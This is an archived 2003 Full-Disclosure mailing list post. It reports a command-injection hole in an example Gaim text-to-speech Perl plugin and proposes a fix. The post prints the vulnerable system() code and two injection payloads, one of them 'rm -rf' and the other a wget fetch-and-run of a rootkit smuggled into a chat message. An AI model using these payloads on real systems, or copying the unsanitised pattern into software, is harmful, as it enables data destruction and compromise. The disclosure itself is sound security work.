lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <1066231795.759.179.camel@localhost>
From: error at lostinthenoise.net (error)
Subject: Gaim festival plugin exploit

It has come to my attention that people have actually used this example
code for a gaim plugin:

AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");

sub goodbye {
	AIM::print("Module Unloaded", "Unloaded Festival TTS");
}

sub synthesize {
    my $string = $_[0];
    $string =~ s/\<.*?\>//g;
    $string =~ s/\".*\"//;
    system("echo \"$string\" | /usr/bin/festival --tts");
}

As taken from:
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl

This has to be one of the most amusing ways to gain a local users
privileges I have ever seen by an "Expert (TM)"

Exploit code?
You have a shell through gaim with that.

Just pass it this message (or really any message for that matter):

Hey, I just wanted to exploit your box, do you mind?"; rm -rf;

Or perhaps:

Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
rootkit;./rootkit

Perhaps someone should ask:

"(Is s/[^\w]//g really that hard to do?!)"

So a fixed version would look like this:

AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");

sub goodbye {
	AIM::print("Module Unloaded", "Unloaded Festival TTS");
}

sub synthesize {
    my $string = $_[0];
    $string =~ s/\<.*?\>//g;
    $string =~ s/\".*\"//;
    $string =~ s/[^\w]//g;
    system("echo \"$string\" | /usr/bin/festival --tts");
}

Just a minor comment, nothing special.
-- 
error <error@...tinthenoise.net>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 155 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031015/f293df4a/attachment-0001.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ